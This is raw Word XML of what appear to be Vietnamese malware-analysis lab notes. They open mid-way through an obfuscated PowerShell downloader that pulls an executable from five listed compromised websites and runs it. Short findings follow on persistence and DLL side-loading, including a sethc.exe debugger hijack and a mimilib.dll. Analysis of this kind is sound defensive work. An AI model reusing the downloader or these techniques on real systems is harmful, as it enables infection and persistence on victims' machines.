      <w:r w:rsidRPr="00D27E02">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
        <w:t>$Dvbarexgme=$env:userprofile+'\'+$Qlidsvmgx+'.exe';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="143AA1B9" w14:textId="77777777" w:rsidR="00D27E02" w:rsidRPr="00D27E02" w:rsidRDefault="00D27E02" w:rsidP="00D27E02">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D27E02">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
        <w:t>$Nyvgeunamuv='Qwlelligoxb';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="285AEFD4" w14:textId="77777777" w:rsidR="00D27E02" w:rsidRPr="00D27E02" w:rsidRDefault="00D27E02" w:rsidP="00D27E02">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D27E02">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
        <w:t>$Mgufpvaskhlz=..('n'+'ew-ob'+'ject') net.webclient;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43AF65A4" w14:textId="77777777" w:rsidR="00D27E02" w:rsidRPr="00D27E02" w:rsidRDefault="00D27E02" w:rsidP="00D27E02">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D27E02">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
        <w:t>$Snotuzji='https://www.arfajbd.com/wp-admin/kx432434/*https://hefo.com/wp-content/5zuz9ir00606/*http://icloudgraphics.com/wp-content/o1cu7628/*https://bucketlistadventures.com/m5_edit_item/06605ld03197/*http://naavikschool.com/naavikschool.com/ooqvi7a0682/';.``'SPL`I`t'(''*)$Zwecplcmhnzc='Ofrhbvbgo';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ADB2550" w14:textId="77777777" w:rsidR="00D27E02" w:rsidRPr="00D27E02" w:rsidRDefault="00D27E02" w:rsidP="00D27E02">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D27E02">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
        <w:t>foreach($Sixenfhuvxlow in $Snotuzji)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="043334A6" w14:textId="77777777" w:rsidR="00D27E02" w:rsidRPr="00D27E02" w:rsidRDefault="00D27E02" w:rsidP="00D27E02">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D27E02">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B777BD4" w14:textId="77777777" w:rsidR="00D27E02" w:rsidRPr="00D27E02" w:rsidRDefault="00D27E02" w:rsidP="00D27E02">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D27E02">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  try</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71D63E57" w14:textId="77777777" w:rsidR="00D27E02" w:rsidRPr="00D27E02" w:rsidRDefault="00D27E02" w:rsidP="00D27E02">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D27E02">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43229700" w14:textId="77777777" w:rsidR="00D27E02" w:rsidRPr="00D27E02" w:rsidRDefault="00D27E02" w:rsidP="00D27E02">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D27E02">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">      $Mgufpvaskhlz."d`Ow`LOad`FilE"($Sixenfhuvxlow, $Dvbarexgme);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2107BD88" w14:textId="77777777" w:rsidR="00D27E02" w:rsidRPr="00D27E02" w:rsidRDefault="00D27E02" w:rsidP="00D27E02">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D27E02">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">      $Hjyeuxoehr='Fejljctrajft';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40FEDEC7" w14:textId="77777777" w:rsidR="00D27E02" w:rsidRPr="00D27E02" w:rsidRDefault="00D27E02" w:rsidP="00D27E02">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D27E02">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">      If((..('G'+'e'+'t-Item') $Dvbarexgme)."L`E`N`GTH" -ge 26474)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CB54001" w14:textId="77777777" w:rsidR="00D27E02" w:rsidRPr="00D27E02" w:rsidRDefault="00D27E02" w:rsidP="00D27E02">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D27E02">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">      {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20651353" w14:textId="77777777" w:rsidR="00D27E02" w:rsidRPr="00D27E02" w:rsidRDefault="00D27E02" w:rsidP="00D27E02">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D27E02">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        [Diagnostics.Process]::"St`AR`t"($Dvbarexgme);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60A30A07" w14:textId="77777777" w:rsidR="00D27E02" w:rsidRPr="00D27E02" w:rsidRDefault="00D27E02" w:rsidP="00D27E02">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D27E02">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        $Pqabbqfxpvzeu='Nlkwrrxcr';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69C49531" w14:textId="77777777" w:rsidR="00D27E02" w:rsidRPr="00D27E02" w:rsidRDefault="00D27E02" w:rsidP="00D27E02">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D27E02">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        break;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="359C7329" w14:textId="77777777" w:rsidR="00D27E02" w:rsidRPr="00D27E02" w:rsidRDefault="00D27E02" w:rsidP="00D27E02">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D27E02">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        $Spaskmwq='Evozmuqleiihk'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DFAB71F" w14:textId="77777777" w:rsidR="00D27E02" w:rsidRPr="00D27E02" w:rsidRDefault="00D27E02" w:rsidP="00D27E02">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D27E02">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">      }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26500830" w14:textId="77777777" w:rsidR="00D27E02" w:rsidRPr="00D27E02" w:rsidRDefault="00D27E02" w:rsidP="00D27E02">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D27E02">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6756F0CD" w14:textId="77777777" w:rsidR="00D27E02" w:rsidRPr="00D27E02" w:rsidRDefault="00D27E02" w:rsidP="00D27E02">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D27E02">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    catch{}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D60E0BC" w14:textId="77777777" w:rsidR="00D27E02" w:rsidRPr="00D27E02" w:rsidRDefault="00D27E02" w:rsidP="00D27E02">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D27E02">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53D6B97C" w14:textId="77777777" w:rsidR="00D27E02" w:rsidRDefault="00D27E02" w:rsidP="00D27E02">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D27E02">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
        <w:t>$Imjfroitwtypw='Mhweqwhphs'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11DD6F39" w14:textId="77777777" w:rsidR="006C3FF5" w:rsidRDefault="006C3FF5" w:rsidP="00D27E02">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54074187" w14:textId="339E1D4C" w:rsidR="00575176" w:rsidRDefault="00575176" w:rsidP="00D27E02">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
        <w:t>Lab10:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="187605ED" w14:textId="753FA89F" w:rsidR="00997B40" w:rsidRDefault="00447F68" w:rsidP="00D27E02">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2634D84B" wp14:editId="7A2BABAC">
            <wp:extent cx="5943600" cy="3343275"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="53043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7907" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId16"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3343275"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="76DBF1AF" w14:textId="77777777" w:rsidR="00447F68" w:rsidRDefault="00447F68" w:rsidP="00D27E02">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25733219" w14:textId="7865DCFE" w:rsidR="00997B40" w:rsidRDefault="00997B40" w:rsidP="00D27E02">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
        <w:t>Lab11:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4883244D" w14:textId="2A0F2A70" w:rsidR="00997B40" w:rsidRDefault="00997B40" w:rsidP="00D27E02">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Mã độc thay đổi đường dẫn của </w:t>
      </w:r>
      <m:oMath>
        <m:r>
          <w:rPr>
            <w:rFonts w:ascii="Cambria Math" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Cambria Math"/>
          </w:rPr>
          <m:t xml:space="preserve">sethc.exe </m:t>
        </m:r>
      </m:oMath>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">thành </w:t>
      </w:r>
      <m:oMath>
        <m:r>
          <w:rPr>
            <w:rFonts w:ascii="Cambria Math" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Cambria Math"/>
          </w:rPr>
          <m:t>cmd.exe</m:t>
        </m:r>
      </m:oMath>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> trong registry</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68C6C19E" w14:textId="048C1CBF" w:rsidR="00997B40" w:rsidRDefault="00997B40" w:rsidP="00D27E02">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="1F2328"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="1F2328"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B612A5A" w14:textId="77777777" w:rsidR="00447F68" w:rsidRDefault="00447F68" w:rsidP="00D27E02">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="1F2328"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4637542F" w14:textId="2DF982A8" w:rsidR="00997B40" w:rsidRDefault="00B35116" w:rsidP="00D27E02">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="1F2328"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="1F2328"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Lab12:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="436BE5D7" w14:textId="1188F914" w:rsidR="00131CE5" w:rsidRDefault="00131CE5" w:rsidP="00D27E02">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="1F2328"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="1F2328"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">Mã độc </w:t>
      </w:r>
      <w:r w:rsidRPr="00131CE5">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="1F2328"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>C:\Windows\system32\NPIlium.dll</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="1F2328"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57C7609A" w14:textId="77777777" w:rsidR="00F745B4" w:rsidRDefault="00F745B4" w:rsidP="00D27E02">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="1F2328"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1DE0EF75" w14:textId="002C6131" w:rsidR="00131CE5" w:rsidRDefault="00131CE5" w:rsidP="00D27E02">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="1F2328"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="1F2328"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Lab13:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BDE9B40" w14:textId="394CF4CC" w:rsidR="00575176" w:rsidRDefault="00131CE5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Mã độc dll trong </w:t>
      </w:r>
      <w:r w:rsidRPr="00131CE5">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
        <w:t>C:\ProgramFiles\PRTGNetworkMonitor\TmDbgLog.dll</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> được dùng trên lsm cùng thư mục</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A2C658E" w14:textId="77777777" w:rsidR="00F745B4" w:rsidRDefault="00F745B4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23404F04" w14:textId="56345783" w:rsidR="00F745B4" w:rsidRDefault="00F745B4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
        <w:t>Lab14:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07BE0643" w14:textId="20EC31C9" w:rsidR="00F745B4" w:rsidRDefault="00F745B4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Mã độc dll trong </w:t>
      </w:r>
      <w:r w:rsidRPr="00F745B4">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
        <w:t>"C:\Windows\QcLite.dll"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> được gọi bởi QcConsole </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A9E8A05" w14:textId="77777777" w:rsidR="00667416" w:rsidRDefault="00667416">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="393B3B22" w14:textId="77777777" w:rsidR="000A4132" w:rsidRDefault="000A4132">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4AF9D670" w14:textId="77777777" w:rsidR="000A4132" w:rsidRDefault="000A4132">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="426FC58F" w14:textId="30586A7C" w:rsidR="00667416" w:rsidRDefault="00667416">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Lab15:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3594ED26" w14:textId="5FD336AF" w:rsidR="00667416" w:rsidRDefault="000A4132">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="44E5B130" wp14:editId="08994622">
            <wp:extent cx="5943600" cy="3343275"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="191777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77971" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId17"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3343275"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="542F42B3" w14:textId="77777777" w:rsidR="000A4132" w:rsidRDefault="000A4132">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="186453C5" w14:textId="1ACE9585" w:rsidR="000A4132" w:rsidRDefault="000A4132">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
        <w:t>Lab16:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08B27C56" w14:textId="6A64826E" w:rsidR="000A4132" w:rsidRDefault="00115087">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
        <w:t>Mã độc: “</w:t>
      </w:r>
      <w:r w:rsidRPr="00115087">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
        <w:t>c:\users\public\regasm.exe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E3250A9" w14:textId="77777777" w:rsidR="00115087" w:rsidRDefault="00115087">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17A6F85C" w14:textId="486CCE02" w:rsidR="00115087" w:rsidRDefault="00115087">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
        <w:t>Lab17:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45EE99E6" w14:textId="282D7672" w:rsidR="00115087" w:rsidRDefault="00594754">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
        <w:t>Mã độc: “</w:t>
      </w:r>
      <w:r w:rsidRPr="00594754">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
        <w:t>c:\windows\system32\mimilib.dll</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidR="00F853D8">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> (dll này có verifed nhưng mà vẫn là malware?)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46216719" w14:textId="77777777" w:rsidR="00AC7285" w:rsidRDefault="00AC7285">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="470A43BB" w14:textId="39BED283" w:rsidR="00594754" w:rsidRDefault="00AC7285">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
        <w:t>Lab18:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B655D07" w14:textId="0F53D515" w:rsidR="00AC7285" w:rsidRDefault="00AC7285">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
        <w:t>Mã độc: “</w:t>
      </w:r>
      <w:r w:rsidRPr="00AC7285">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
        <w:t>C:\Windows\apppatch\NvSmartMax.dll</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
        <w:t>” được gọi bởi NvSmart.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="248E934A" w14:textId="77777777" w:rsidR="00AC7285" w:rsidRDefault="00AC7285">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
